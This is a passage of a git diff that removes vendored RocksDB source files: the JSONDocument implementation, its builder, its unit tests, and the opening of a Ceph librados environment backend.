-    case kObject:
-      CreateObject(&data_, &value_);
-      break;
-    case kBool:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeBool, _1, false));
-      break;
-    case kDouble:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeDouble, _1, 0.));
-      break;
-    case kArray:
-      CreateArray(&data_, &value_);
-      break;
-    case kInt64:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeInt64, _1, 0));
-      break;
-    case kString:
-      InitString(&data_, &value_, "");
-      break;
-    default:
-      assert(false);
-  }
-}
-
-JSONDocument::JSONDocument(const JSONDocument& jsonDocument) {
-  if (jsonDocument.IsOwner()) {
-    InitFromValue(jsonDocument.value_);
-  } else {
-    value_ = jsonDocument.value_;
-  }
-}
-
-JSONDocument::JSONDocument(JSONDocument&& jsonDocument) {
-  value_ = jsonDocument.value_;
-  data_.swap(jsonDocument.data_);
-}
-
-JSONDocument& JSONDocument::operator=(JSONDocument jsonDocument) {
-  value_ = jsonDocument.value_;
-  data_.swap(jsonDocument.data_);
-  return *this;
-}
-
-JSONDocument::Type JSONDocument::type() const {
-  switch (value_->type()) {
-    case fbson::FbsonType::T_Null:
-      return JSONDocument::kNull;
-
-    case fbson::FbsonType::T_True:
-    case fbson::FbsonType::T_False:
-      return JSONDocument::kBool;
-
-    case fbson::FbsonType::T_Int8:
-    case fbson::FbsonType::T_Int16:
-    case fbson::FbsonType::T_Int32:
-    case fbson::FbsonType::T_Int64:
-      return JSONDocument::kInt64;
-
-    case fbson::FbsonType::T_Double:
-      return JSONDocument::kDouble;
-
-    case fbson::FbsonType::T_String:
-      return JSONDocument::kString;
-
-    case fbson::FbsonType::T_Object:
-      return JSONDocument::kObject;
-
-    case fbson::FbsonType::T_Array:
-      return JSONDocument::kArray;
-
-    case fbson::FbsonType::T_Binary:
-    default:
-      assert(false);
-  }
-  return JSONDocument::kNull;
-}
-
-bool JSONDocument::Contains(const std::string& key) const {
-  assert(IsObject());
-  auto objectVal = reinterpret_cast<fbson::ObjectVal*>(value_);
-  return objectVal->find(key.c_str()) != nullptr;
-}
-
-JSONDocument JSONDocument::operator[](const std::string& key) const {
-  assert(IsObject());
-  auto objectVal = reinterpret_cast<fbson::ObjectVal*>(value_);
-  auto foundValue = objectVal->find(key.c_str());
-  assert(foundValue != nullptr);
-  // No need to save paths in const objects
-  JSONDocument ans(foundValue, false);
-  return ans;
-}
-
-size_t JSONDocument::Count() const {
-  assert(IsObject() || IsArray());
-  if (IsObject()) {
-    // TODO(stash): add to fbson?
-    const fbson::ObjectVal& objectVal =
-          *reinterpret_cast<fbson::ObjectVal*>(value_);
-    return ObjectNumElem(objectVal);
-  } else if (IsArray()) {
-    auto arrayVal = reinterpret_cast<fbson::ArrayVal*>(value_);
-    return arrayVal->numElem();
-  }
-  assert(false);
-  return 0;
-}
-
-JSONDocument JSONDocument::operator[](size_t i) const {
-  assert(IsArray());
-  auto arrayVal = reinterpret_cast<fbson::ArrayVal*>(value_);
-  auto foundValue = arrayVal->get(static_cast<int>(i));
-  JSONDocument ans(foundValue, false);
-  return ans;
-}
-
-bool JSONDocument::IsNull() const {
-  return value_->isNull();
-}
-
-bool JSONDocument::IsArray() const {
-  return value_->isArray();
-}
-
-bool JSONDocument::IsBool() const {
-  return value_->isTrue() || value_->isFalse();
-}
-
-bool JSONDocument::IsDouble() const {
-  return value_->isDouble();
-}
-
-bool JSONDocument::IsInt64() const {
-  return value_->isInt8() || value_->isInt16() ||
-         value_->isInt32() || value_->isInt64();
-}
-
-bool JSONDocument::IsObject() const {
-  return value_->isObject();
-}
-
-bool JSONDocument::IsString() const {
-  return value_->isString();
-}
-
-bool JSONDocument::GetBool() const {
-  assert(IsBool());
-  return value_->isTrue();
-}
-
-double JSONDocument::GetDouble() const {
-  assert(IsDouble());
-  return ((fbson::DoubleVal*)value_)->val();
-}
-
-int64_t JSONDocument::GetInt64() const {
-  assert(IsInt64());
-  return GetInt64ValFromFbsonNumericType(value_);
-}
-
-std::string JSONDocument::GetString() const {
-  assert(IsString());
-  fbson::StringVal* stringVal = (fbson::StringVal*)value_;
-  return std::string(stringVal->getBlob(), stringVal->getBlobLen());
-}
-
-namespace {
-
-// FbsonValue can be int8, int16, int32, int64
-bool CompareNumeric(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  assert(IsNumeric(left) && IsNumeric(right));
-  return GetInt64ValFromFbsonNumericType(left) ==
-         GetInt64ValFromFbsonNumericType(right);
-}
-
-bool CompareSimpleTypes(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (IsNumeric(left)) {
-    return CompareNumeric(left, right);
-  }
-  if (left->numPackedBytes() != right->numPackedBytes()) {
-    return false;
-  }
-  return memcmp(left, right, left->numPackedBytes()) == 0;
-}
-
-bool CompareFbsonValue(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (!IsComparable(left, right)) {
-    return false;
-  }
-
-  switch (left->type()) {
-    case fbson::FbsonType::T_True:
-    case fbson::FbsonType::T_False:
-    case fbson::FbsonType::T_Null:
-      return true;
-    case fbson::FbsonType::T_Int8:
-    case fbson::FbsonType::T_Int16:
-    case fbson::FbsonType::T_Int32:
-    case fbson::FbsonType::T_Int64:
-      return CompareNumeric(left, right);
-    case fbson::FbsonType::T_String:
-    case fbson::FbsonType::T_Double:
-      return CompareSimpleTypes(left, right);
-    case fbson::FbsonType::T_Object:
-    {
-      auto leftObject = reinterpret_cast<fbson::ObjectVal*>(left);
-      auto rightObject = reinterpret_cast<fbson::ObjectVal*>(right);
-      if (ObjectNumElem(*leftObject) != ObjectNumElem(*rightObject)) {
-        return false;
-      }
-      for (auto && keyValue : *leftObject) {
-        std::string str(keyValue.getKeyStr(), keyValue.klen());
-        if (rightObject->find(str.c_str()) == nullptr) {
-          return false;
-        }
-        if (!CompareFbsonValue(keyValue.value(),
-                               rightObject->find(str.c_str()))) {
-          return false;
-        }
-      }
-      return true;
-    }
-    case fbson::FbsonType::T_Array:
-    {
-      auto leftArr = reinterpret_cast<fbson::ArrayVal*>(left);
-      auto rightArr = reinterpret_cast<fbson::ArrayVal*>(right);
-      if (leftArr->numElem() != rightArr->numElem()) {
-        return false;
-      }
-      for (int i = 0; i < static_cast<int>(leftArr->numElem()); ++i) {
-        if (!CompareFbsonValue(leftArr->get(i), rightArr->get(i))) {
-          return false;
-        }
-      }
-      return true;
-    }
-    default:
-      assert(false);
-  }
-  return false;
-}
-
-}  // namespace
-
-bool JSONDocument::operator==(const JSONDocument& rhs) const {
-  return CompareFbsonValue(value_, rhs.value_);
-}
-
-bool JSONDocument::operator!=(const JSONDocument& rhs) const {
-  return !(*this == rhs);
-}
-
-JSONDocument JSONDocument::Copy() const {
-  return JSONDocument(value_, true);
-}
-
-bool JSONDocument::IsOwner() const {
-  return data_.get() != nullptr;
-}
-
-std::string JSONDocument::DebugString() const {
-  fbson::FbsonToJson fbsonToJson;
-  return fbsonToJson.json(value_);
-}
-
-JSONDocument::ItemsIteratorGenerator JSONDocument::Items() const {
-  assert(IsObject());
-  return ItemsIteratorGenerator(*(reinterpret_cast<fbson::ObjectVal*>(value_)));
-}
-
-// TODO(icanadi) (perf) allocate objects with arena
-JSONDocument* JSONDocument::ParseJSON(const char* json) {
-  fbson::FbsonJsonParser parser;
-  if (!parser.parse(json)) {
-    return nullptr;
-  }
-
-  auto fbsonVal = fbson::FbsonDocument::createValue(
-                    parser.getWriter().getOutput()->getBuffer(),
-              static_cast<uint32_t>(parser.getWriter().getOutput()->getSize()));
-
-  if (fbsonVal == nullptr) {
-    return nullptr;
-  }
-
-  return new JSONDocument(fbsonVal, true);
-}
-
-void JSONDocument::Serialize(std::string* dst) const {
-  // first byte is reserved for header
-  // currently, header is only version number. that will help us provide
-  // backwards compatility. we might also store more information here if
-  // necessary
-  dst->push_back(kSerializationFormatVersion);
-  dst->push_back(FBSON_VER);
-  dst->append(reinterpret_cast<char*>(value_), value_->numPackedBytes());
-}
-
-const char JSONDocument::kSerializationFormatVersion = 2;
-
-JSONDocument* JSONDocument::Deserialize(const Slice& src) {
-  Slice input(src);
-  if (src.size() == 0) {
-    return nullptr;
-  }
-  char header = input[0];
-  if (header == 1) {
-    assert(false);
-  }
-  input.remove_prefix(1);
-  auto value = fbson::FbsonDocument::createValue(input.data(),
-                static_cast<uint32_t>(input.size()));
-  if (value == nullptr) {
-    return nullptr;
-  }
-
-  return new JSONDocument(value, true);
-}
-
-class JSONDocument::const_item_iterator::Impl {
- public:
-  typedef fbson::ObjectVal::const_iterator It;
-
-  explicit Impl(It it) : it_(it) {}
-
-  const char* getKeyStr() const {
-    return it_->getKeyStr();
-  }
-
-  uint8_t klen() const {
-    return it_->klen();
-  }
-
-  It& operator++() {
-    return ++it_;
-  }
-
-  bool operator!=(const Impl& other) {
-    return it_ != other.it_;
-  }
-
-  fbson::FbsonValue* value() const {
-    return it_->value();
-  }
-
- private:
-  It it_;
-};
-
-JSONDocument::const_item_iterator::const_item_iterator(Impl* impl)
-: it_(impl) {}
-
-JSONDocument::const_item_iterator::const_item_iterator(const_item_iterator&& a)
-: it_(std::move(a.it_)) {}
-
-JSONDocument::const_item_iterator&
-  JSONDocument::const_item_iterator::operator++() {
-  ++(*it_);
-  return *this;
-}
-
-bool JSONDocument::const_item_iterator::operator!=(
-                                  const const_item_iterator& other) {
-  return *it_ != *(other.it_);
-}
-
-JSONDocument::const_item_iterator::~const_item_iterator() {
-}
-
-JSONDocument::const_item_iterator::value_type
-  JSONDocument::const_item_iterator::operator*() {
-  return JSONDocument::const_item_iterator::value_type(std::string(it_->getKeyStr(), it_->klen()),
-    JSONDocument(it_->value(), false));
-}
-
-JSONDocument::ItemsIteratorGenerator::ItemsIteratorGenerator(
-                                      const fbson::ObjectVal& object)
-  : object_(object) {}
-
-JSONDocument::const_item_iterator
-      JSONDocument::ItemsIteratorGenerator::begin() const {
-  return const_item_iterator(new const_item_iterator::Impl(object_.begin()));
-}
-
-JSONDocument::const_item_iterator
-      JSONDocument::ItemsIteratorGenerator::end() const {
-  return const_item_iterator(new const_item_iterator::Impl(object_.end()));
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document_builder.cc b/thirdparty/rocksdb/utilities/document/json_document_builder.cc
deleted file mode 100644
index 7aa95e4..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document_builder.cc
+++ /dev/null
@@ -1,120 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <assert.h>
-#include <limits>
-#include <stdint.h>
-#include "rocksdb/utilities/json_document.h"
-#include "third-party/fbson/FbsonWriter.h"
-
-namespace rocksdb {
-JSONDocumentBuilder::JSONDocumentBuilder()
-: writer_(new fbson::FbsonWriter()) {
-}
-
-JSONDocumentBuilder::JSONDocumentBuilder(fbson::FbsonOutStream* out)
-: writer_(new fbson::FbsonWriter(*out)) {
-}
-
-void JSONDocumentBuilder::Reset() {
-  writer_->reset();
-}
-
-bool JSONDocumentBuilder::WriteStartArray() {
-  return writer_->writeStartArray();
-}
-
-bool JSONDocumentBuilder::WriteEndArray() {
-  return writer_->writeEndArray();
-}
-
-bool JSONDocumentBuilder::WriteStartObject() {
-  return writer_->writeStartObject();
-}
-
-bool JSONDocumentBuilder::WriteEndObject() {
-  return writer_->writeEndObject();
-}
-
-bool JSONDocumentBuilder::WriteKeyValue(const std::string& key,
-                                        const JSONDocument& value) {
-  assert(key.size() <= std::numeric_limits<uint8_t>::max());
-  size_t bytesWritten = writer_->writeKey(key.c_str(),
-    static_cast<uint8_t>(key.size()));
-  if (bytesWritten == 0) {
-    return false;
-  }
-  return WriteJSONDocument(value);
-}
-
-bool JSONDocumentBuilder::WriteJSONDocument(const JSONDocument& value) {
-  switch (value.type()) {
-    case JSONDocument::kNull:
-      return writer_->writeNull() != 0;
-    case JSONDocument::kInt64:
-      return writer_->writeInt64(value.GetInt64());
-    case JSONDocument::kDouble:
-      return writer_->writeDouble(value.GetDouble());
-    case JSONDocument::kBool:
-      return writer_->writeBool(value.GetBool());
-    case JSONDocument::kString:
-    {
-      bool res = writer_->writeStartString();
-      if (!res) {
-        return false;
-      }
-      const std::string& str = value.GetString();
-      res = writer_->writeString(str.c_str(),
-                  static_cast<uint32_t>(str.size()));
-      if (!res) {
-        return false;
-      }
-      return writer_->writeEndString();
-    }
-    case JSONDocument::kArray:
-    {
-      bool res = WriteStartArray();
-      if (!res) {
-        return false;
-      }
-      for (size_t i = 0; i < value.Count(); ++i) {
-        res = WriteJSONDocument(value[i]);
-        if (!res) {
-          return false;
-        }
-      }
-      return WriteEndArray();
-    }
-    case JSONDocument::kObject:
-    {
-      bool res = WriteStartObject();
-      if (!res) {
-        return false;
-      }
-      for (auto keyValue : value.Items()) {
-        WriteKeyValue(keyValue.first, keyValue.second);
-      }
-      return WriteEndObject();
-    }
-    default:
-      assert(false);
-  }
-  return false;
-}
-
-JSONDocument JSONDocumentBuilder::GetJSONDocument() {
-  fbson::FbsonValue* value =
-      fbson::FbsonDocument::createValue(writer_->getOutput()->getBuffer(),
-                       static_cast<uint32_t>(writer_->getOutput()->getSize()));
-  return JSONDocument(value, true);
-}
-
-JSONDocumentBuilder::~JSONDocumentBuilder() {
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document_test.cc b/thirdparty/rocksdb/utilities/document/json_document_test.cc
deleted file mode 100644
index c7bfb39..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document_test.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <set>
-#include <string>
-
-#include "rocksdb/utilities/json_document.h"
-
-#include "util/testutil.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace {
-void AssertField(const JSONDocument& json, const std::string& field) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsNull());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 const std::string& expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsString());
-  ASSERT_EQ(expected, json[field].GetString());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 int64_t expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsInt64());
-  ASSERT_EQ(expected, json[field].GetInt64());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 bool expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsBool());
-  ASSERT_EQ(expected, json[field].GetBool());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 double expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsDouble());
-  ASSERT_DOUBLE_EQ(expected, json[field].GetDouble());
-}
-}  // namespace
-
-class JSONDocumentTest : public testing::Test {
- public:
-  JSONDocumentTest()
-  : rnd_(101)
-  {}
-
-  void AssertSampleJSON(const JSONDocument& json) {
-    AssertField(json, "title", std::string("json"));
-    AssertField(json, "type", std::string("object"));
-    // properties
-    ASSERT_TRUE(json.Contains("properties"));
-    ASSERT_TRUE(json["properties"].Contains("flags"));
-    ASSERT_TRUE(json["properties"]["flags"].IsArray());
-    ASSERT_EQ(3u, json["properties"]["flags"].Count());
-    ASSERT_TRUE(json["properties"]["flags"][0].IsInt64());
-    ASSERT_EQ(10, json["properties"]["flags"][0].GetInt64());
-    ASSERT_TRUE(json["properties"]["flags"][1].IsString());
-    ASSERT_EQ("parse", json["properties"]["flags"][1].GetString());
-    ASSERT_TRUE(json["properties"]["flags"][2].IsObject());
-    AssertField(json["properties"]["flags"][2], "tag", std::string("no"));
-    AssertField(json["properties"]["flags"][2], std::string("status"));
-    AssertField(json["properties"], "age", 110.5e-4);
-    AssertField(json["properties"], "depth", static_cast<int64_t>(-10));
-    // test iteration
-    std::set<std::string> expected({"flags", "age", "depth"});
-    for (auto item : json["properties"].Items()) {
-      auto iter = expected.find(item.first);
-      ASSERT_TRUE(iter != expected.end());
-      expected.erase(iter);
-    }
-    ASSERT_EQ(0U, expected.size());
-    ASSERT_TRUE(json.Contains("latlong"));
-    ASSERT_TRUE(json["latlong"].IsArray());
-    ASSERT_EQ(2u, json["latlong"].Count());
-    ASSERT_TRUE(json["latlong"][0].IsDouble());
-    ASSERT_EQ(53.25, json["latlong"][0].GetDouble());
-    ASSERT_TRUE(json["latlong"][1].IsDouble());
-    ASSERT_EQ(43.75, json["latlong"][1].GetDouble());
-    AssertField(json, "enabled", true);
-  }
-
-  const std::string kSampleJSON =
-      "{ \"title\" : \"json\", \"type\" : \"object\", \"properties\" : { "
-      "\"flags\": [10, \"parse\", {\"tag\": \"no\", \"status\": null}], "
-      "\"age\": 110.5e-4, \"depth\": -10 }, \"latlong\": [53.25, 43.75], "
-      "\"enabled\": true }";
-
-  const std::string kSampleJSONDifferent =
-      "{ \"title\" : \"json\", \"type\" : \"object\", \"properties\" : { "
-      "\"flags\": [10, \"parse\", {\"tag\": \"no\", \"status\": 2}], "
-      "\"age\": 110.5e-4, \"depth\": -10 }, \"latlong\": [53.25, 43.75], "
-      "\"enabled\": true }";
-
-  Random rnd_;
-};
-
-TEST_F(JSONDocumentTest, MakeNullTest) {
-  JSONDocument x;
-  ASSERT_TRUE(x.IsNull());
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(!x.IsBool());
-}
-
-TEST_F(JSONDocumentTest, MakeBoolTest) {
-  {
-    JSONDocument x(true);
-    ASSERT_TRUE(x.IsOwner());
-    ASSERT_TRUE(x.IsBool());
-    ASSERT_TRUE(!x.IsInt64());
-    ASSERT_EQ(x.GetBool(), true);
-  }
-
-  {
-    JSONDocument x(false);
-    ASSERT_TRUE(x.IsOwner());
-    ASSERT_TRUE(x.IsBool());
-    ASSERT_TRUE(!x.IsInt64());
-    ASSERT_EQ(x.GetBool(), false);
-  }
-}
-
-TEST_F(JSONDocumentTest, MakeInt64Test) {
-  JSONDocument x(static_cast<int64_t>(16));
-  ASSERT_TRUE(x.IsInt64());
-  ASSERT_TRUE(x.IsInt64());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_EQ(x.GetInt64(), 16);
-}
-
-TEST_F(JSONDocumentTest, MakeStringTest) {
-  JSONDocument x("string");
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(x.IsString());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_EQ(x.GetString(), "string");
-}
-
-TEST_F(JSONDocumentTest, MakeDoubleTest) {
-  JSONDocument x(5.6);
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(x.IsDouble());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_EQ(x.GetDouble(), 5.6);
-}
-
-TEST_F(JSONDocumentTest, MakeByTypeTest) {
-  {
-    JSONDocument x(JSONDocument::kNull);
-    ASSERT_TRUE(x.IsNull());
-  }
-  {
-    JSONDocument x(JSONDocument::kBool);
-    ASSERT_TRUE(x.IsBool());
-  }
-  {
-    JSONDocument x(JSONDocument::kString);
-    ASSERT_TRUE(x.IsString());
-  }
-  {
-    JSONDocument x(JSONDocument::kInt64);
-    ASSERT_TRUE(x.IsInt64());
-  }
-  {
-    JSONDocument x(JSONDocument::kDouble);
-    ASSERT_TRUE(x.IsDouble());
-  }
-  {
-    JSONDocument x(JSONDocument::kObject);
-    ASSERT_TRUE(x.IsObject());
-  }
-  {
-    JSONDocument x(JSONDocument::kArray);
-    ASSERT_TRUE(x.IsArray());
-  }
-}
-
-TEST_F(JSONDocumentTest, Parsing) {
-  std::unique_ptr<JSONDocument> parsed_json(
-          JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed_json->IsOwner());
-  ASSERT_TRUE(parsed_json != nullptr);
-  AssertSampleJSON(*parsed_json);
-
-  // test deep copying
-  JSONDocument copied_json_document(*parsed_json);
-  AssertSampleJSON(copied_json_document);
-  ASSERT_TRUE(copied_json_document == *parsed_json);
-
-  std::unique_ptr<JSONDocument> parsed_different_sample(
-      JSONDocument::ParseJSON(kSampleJSONDifferent.c_str()));
-  ASSERT_TRUE(parsed_different_sample != nullptr);
-  ASSERT_TRUE(!(*parsed_different_sample == copied_json_document));
-
-  // parse error
-  const std::string kFaultyJSON =
-      kSampleJSON.substr(0, kSampleJSON.size() - 10);
-  ASSERT_TRUE(JSONDocument::ParseJSON(kFaultyJSON.c_str()) == nullptr);
-}
-
-TEST_F(JSONDocumentTest, Serialization) {
-  std::unique_ptr<JSONDocument> parsed_json(
-            JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed_json != nullptr);
-  ASSERT_TRUE(parsed_json->IsOwner());
-  std::string serialized;
-  parsed_json->Serialize(&serialized);
-
-  std::unique_ptr<JSONDocument> deserialized_json(
-            JSONDocument::Deserialize(Slice(serialized)));
-  ASSERT_TRUE(deserialized_json != nullptr);
-  AssertSampleJSON(*deserialized_json);
-
-  // deserialization failure
-  ASSERT_TRUE(JSONDocument::Deserialize(
-                  Slice(serialized.data(), serialized.size() - 10)) == nullptr);
-}
-
-TEST_F(JSONDocumentTest, OperatorEqualsTest) {
-  // kNull
-  ASSERT_TRUE(JSONDocument() == JSONDocument());
-
-  // kBool
-  ASSERT_TRUE(JSONDocument(false) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(false) == JSONDocument(false));
-  ASSERT_TRUE(JSONDocument(true) == JSONDocument(true));
-  ASSERT_TRUE(JSONDocument(false) != JSONDocument(true));
-
-  // kString
-  ASSERT_TRUE(JSONDocument("test") != JSONDocument());
-  ASSERT_TRUE(JSONDocument("test") == JSONDocument("test"));
-
-  // kInt64
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) !=
-              JSONDocument(static_cast<int64_t>(14)));
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) ==
-              JSONDocument(static_cast<int64_t>(15)));
-
-  unique_ptr<JSONDocument> arrayWithInt8Doc(JSONDocument::ParseJSON("[8]"));
-  ASSERT_TRUE(arrayWithInt8Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt8Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt8Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt8Doc)[0] == JSONDocument(static_cast<int64_t>(8)));
-
-  unique_ptr<JSONDocument> arrayWithInt16Doc(JSONDocument::ParseJSON("[512]"));
-  ASSERT_TRUE(arrayWithInt16Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt16Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt16Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt16Doc)[0] ==
-              JSONDocument(static_cast<int64_t>(512)));
-
-  unique_ptr<JSONDocument> arrayWithInt32Doc(
-    JSONDocument::ParseJSON("[1000000]"));
-  ASSERT_TRUE(arrayWithInt32Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt32Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt32Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt32Doc)[0] ==
-               JSONDocument(static_cast<int64_t>(1000000)));
-
-  // kDouble
-  ASSERT_TRUE(JSONDocument(15.) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(15.) != JSONDocument(14.));
-  ASSERT_TRUE(JSONDocument(15.) == JSONDocument(15.));
-}
-
-TEST_F(JSONDocumentTest, JSONDocumentBuilderTest) {
-  unique_ptr<JSONDocument> parsedArray(
-    JSONDocument::ParseJSON("[1, [123, \"a\", \"b\"], {\"b\":\"c\"}]"));
-  ASSERT_TRUE(parsedArray != nullptr);
-
-  JSONDocumentBuilder builder;
-  ASSERT_TRUE(builder.WriteStartArray());
-  ASSERT_TRUE(builder.WriteJSONDocument(1));
-
-  ASSERT_TRUE(builder.WriteStartArray());
-    ASSERT_TRUE(builder.WriteJSONDocument(123));
-    ASSERT_TRUE(builder.WriteJSONDocument("a"));
-    ASSERT_TRUE(builder.WriteJSONDocument("b"));
-  ASSERT_TRUE(builder.WriteEndArray());
-
-  ASSERT_TRUE(builder.WriteStartObject());
-    ASSERT_TRUE(builder.WriteKeyValue("b", "c"));
-  ASSERT_TRUE(builder.WriteEndObject());
-
-  ASSERT_TRUE(builder.WriteEndArray());
-
-  ASSERT_TRUE(*parsedArray == builder.GetJSONDocument());
-}
-
-TEST_F(JSONDocumentTest, OwnershipTest) {
-  std::unique_ptr<JSONDocument> parsed(
-          JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed != nullptr);
-  ASSERT_TRUE(parsed->IsOwner());
-
-  // Copy constructor from owner -> owner
-  JSONDocument copy_constructor(*parsed);
-  ASSERT_TRUE(copy_constructor.IsOwner());
-
-  // Copy constructor from non-owner -> non-owner
-  JSONDocument non_owner((*parsed)["properties"]);
-  ASSERT_TRUE(!non_owner.IsOwner());
-
-  // Move constructor from owner -> owner
-  JSONDocument moved_from_owner(std::move(copy_constructor));
-  ASSERT_TRUE(moved_from_owner.IsOwner());
-
-  // Move constructor from non-owner -> non-owner
-  JSONDocument moved_from_non_owner(std::move(non_owner));
-  ASSERT_TRUE(!moved_from_non_owner.IsOwner());
-}
-
-}  //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as JSONDocument is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_librados.cc b/thirdparty/rocksdb/utilities/env_librados.cc
deleted file mode 100644
index 4a0b262..0000000
--- a/thirdparty/rocksdb/utilities/env_librados.cc
+++ /dev/null
@@ -1,1488 +0,0 @@
-// -*- mode:C++; tab-width:8; c-basic-offset:2; indent-tabs-mode:t -*-
-// vim: ts=8 sw=2 smarttab
-
-#include "rocksdb/utilities/env_librados.h"
-#include "util/random.h"
-#include <mutex>
-#include <cstdlib>
-
-namespace rocksdb {
-/* GLOBAL DIFINE */
-// #define DEBUG
-#ifdef DEBUG
-#include <cstdio>
-#include <sys/syscall.h>
-#include <unistd.h>
-#define LOG_DEBUG(...)  do{\
-    printf("[%ld:%s:%i:%s]", syscall(SYS_gettid), __FILE__, __LINE__, __FUNCTION__);\
-    printf(__VA_ARGS__);\
-  }while(0)
-#else
-#define LOG_DEBUG(...)
-#endif
-
-/* GLOBAL CONSTANT */
-const char *default_db_name     = "default_envlibrados_db";
-const char *default_pool_name   = "default_envlibrados_pool";
-const char *default_config_path = "CEPH_CONFIG_PATH";           // the env variable name of ceph configure file
-// maximum dir/file that can store in the fs
-const int MAX_ITEMS_IN_FS = 1 << 30;
-// root dir tag
-const std::string ROOT_DIR_KEY = "/";
-const std::string DIR_ID_VALUE = "<DIR>";
-
-/**
- * @brief convert error code to status
- * @details Convert internal linux error code to Status
- *
- * @param r [description]
- * @return [description]
- */
-Status err_to_status(int r)
-{
-  switch (r) {
-  case 0:
-    return Status::OK();
-  case -ENOENT:
-    return Status::IOError();
-  case -ENODATA:
-  case -ENOTDIR:
-    return Status::NotFound(Status::kNone);
-  case -EINVAL:
-    return Status::InvalidArgument(Status::kNone);
-  case -EIO:
-    return Status::IOError(Status::kNone);
-  default:
-    // FIXME :(
-    assert(0 == "unrecognized error code");
-    return Status::NotSupported(Status::kNone);
-  }
-}
-
-/**
- * @brief split file path into dir path and file name
- * @details
- * Because rocksdb only need a 2-level structure (dir/file), all input path will be shortened to dir/file format
- *  For example:
- *    b/c => dir '/b', file 'c'
- *    /a/b/c => dir '/b', file 'c'
- *
- * @param fn [description]
- * @param dir [description]
- * @param file [description]
- */
-void split(const std::string &fn, std::string *dir, std::string *file) {
-  LOG_DEBUG("[IN]%s\n", fn.c_str());
-  int pos = fn.size() - 1;
-  while ('/' == fn[pos]) --pos;
-  size_t fstart = fn.rfind('/', pos);
-  *file = fn.substr(fstart + 1, pos - fstart);
-
-  pos = fstart;
-  while (pos >= 0 && '/' == fn[pos]) --pos;
-
-  if (pos < 0) {
-    *dir = "/";
-  } else {
-    size_t dstart = fn.rfind('/', pos);
-    *dir = fn.substr(dstart + 1, pos - dstart);
-    *dir = std::string("/") + *dir;
-  }
-
-  LOG_DEBUG("[OUT]%s | %s\n", dir->c_str(), file->c_str());
-}
-
-// A file abstraction for reading sequentially through a file
-class LibradosSequentialFile : public SequentialFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-  int _offset;
-public:
-  LibradosSequentialFile(librados::IoCtx * io_ctx, std::string fid, std::string hint):
-    _io_ctx(io_ctx), _fid(fid), _hint(hint), _offset(0) {}
-
-  ~LibradosSequentialFile() {}
-
-  /**
-   * @brief read file
-   * @details
-   *  Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-   *  written by this routine.  Sets "*result" to the data that was
-   *  read (including if fewer than "n" bytes were successfully read).
-   *  May set "*result" to point at data in "scratch[0..n-1]", so
